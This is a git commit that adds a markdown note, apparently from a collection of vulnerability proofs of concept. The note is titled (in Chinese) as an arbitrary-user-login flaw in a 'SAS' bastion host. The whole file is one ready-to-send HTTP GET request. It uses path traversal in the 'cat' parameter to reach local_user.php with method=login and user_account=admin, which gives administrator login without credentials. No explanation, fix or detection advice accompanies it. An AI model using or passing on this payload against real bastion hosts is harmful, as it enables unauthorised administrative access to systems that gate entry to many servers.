Create 某盟 SAS堡垒机 local_user.php 任意用户登录漏洞.md

2025-02-27 04:39:25 +00:00 · 2023-08-19 20:28:14 +08:00 · 2023-08-19 20:28:14 +08:00 · 80d6111724
commit 80d6111724
parent cd16cee069
1 changed files with 9 additions and 0 deletions
--- a/任意用户登录漏洞.md
+++ b/任意用户登录漏洞.md
@ -0,0 +1,9 @@
+## 某盟 SAS堡垒机 local_user.php 任意用户登录漏洞
+```
+
+GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
+Host: 1.1.1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip, deflate
+Connection: close
+```